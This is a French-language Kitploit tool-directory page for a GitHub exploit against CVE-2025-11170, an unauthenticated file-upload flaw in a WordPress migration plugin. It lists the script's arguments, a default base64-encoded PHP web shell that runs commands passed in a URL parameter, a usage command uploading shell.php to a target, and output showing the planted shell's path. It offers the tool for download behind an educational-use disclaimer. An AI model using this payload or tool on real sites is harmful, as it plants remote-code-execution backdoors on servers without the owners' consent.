Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-11170 — WP移行専用プラグイン pour CPI <= 1.0.2 - Téléchargement de fichier arbitraire non authentifié | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-11170
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2025-11170

CVE-2025-11170

WP移行専用プラグイン pour CPI <= 1.0.2 - Téléchargement de fichier arbitraire non authentifié

Voir le dépôt
2il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-11170

WP移行専用プラグイン for CPI <= 1.0.2 - Téléchargement arbitraire de fichier non authentifié


🚀 WP移行専用プラグイン for CPI <= 1.0.2 - Téléchargement arbitraire de fichier non authentifié

📝 Description

Le plugin WP移行専用プラグイン for CPI pour WordPress est vulnérable aux téléchargements arbitraires de fichiers en raison de l'absence de validation du type de fichier dans la fonction Cpiwm_Import_Controller::import dans toutes les versions jusqu'à la version 1.0.2 incluse.
Cela permet à des attaquants non authentifiés de télécharger des fichiers arbitraires sur le serveur du site affecté, ce qui peut permettre l'exécution de code à distance.

🛡️ Détails de la vulnérabilité

  • CVE : CVE-2025-11170
  • Score CVSS : 9.8 (Critique)
  • Vecteur d'attaque : Téléchargement de fichier distant non authentifié

⚡ Informations sur le script

  • Nom du script : CVE-2025-11170.py
  • Objectif : Exploit automatisé de téléchargement de shell/fichier pour le plugin de migration WordPress CPI vulnérable.

🔧 Utilisation

Arguments

ArgumentDescription
-u, --urlURL cible de base (p. ex., http://target.com/wordpress/). Le script ajoute automatiquement wp-admin/admin-ajax.php.
-f, --filenameNom du shell ou fichier à télécharger. Par défaut : shell.php
-d, --dataContenu du fichier en base64 (ou texte brut). Par défaut : PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
-i, --indexValeur du champ index. Par défaut : 0
-H, --headersEn-têtes HTTP supplémentaires (format : X-Key:Value;K2:Value2)
-t, --timeoutDélai d'attente pour la requête HTTP (secondes). Par défaut : 10
--retriesNombre de tentatives de relance. Par défaut : 3
--backoffFacteur d'attente entre les tentatives (secondes). Par défaut : 0.7
-v, --verboseAugmenter la verbosité pour le débogage (répétable)

🚦 Méthodes expliquées

  • Nxploited_parse_args
    Analyse et valide les arguments d'entrée. Assure la bonne structure du point de terminaison, les en-têtes et l'encodage des données.

  • Nxploited_logging
    Configure une journalisation avancée et la verbosité pour une sortie d'exécution détaillée ou minimale.

  • Nxploited_retry_session
    Initialise une session persistante avec une logique de relance et d'attente pour des communications résilientes.

  • Nxploited_build_payload
    Construit les paramètres de la requête POST pour l'exploitation.

  • Nxploited_send
    Effectue la requête POST réelle vers le point de terminaison vulnérable et gère les réponses/erreurs.

  • Nxploited_output_result
    Traite et formate la réponse, affichant le chemin du shell en cas de succès, ou des informations de débogage sinon.


💡 Exemple d'utilisation

root@kitploit:~
python3 CVE-2025-11170.py -u "http://192.168.100.74:888/wordpress/" -f "shell.php"

Exemple de sortie :

root@kitploit:~
Téléchargement du shell...
Traitement de la réponse...
[+] Téléchargement réussi !
Chemin du shell :
http://192.168.100.74:888/wordpress/wp-content/plugins/cpi-wp-migration/storage/shell.php
Nxploited
Mon GitHub : https://github.com/Nxploited

🚨 Avertissement

Ce script est fourni uniquement à des fins éducatives.
L'utilisation de cet exploit sur des cibles sans autorisation appropriée peut être illégale.
L'auteur décline toute responsabilité en cas d'utilisation abusive, de dommages ou de conséquences juridiques.


📢 Me contacter

GitHub : Nxploited
Telegram : KNxploited


Par : Nxploited ( Khaled Alenazi )

Télécharger l’outil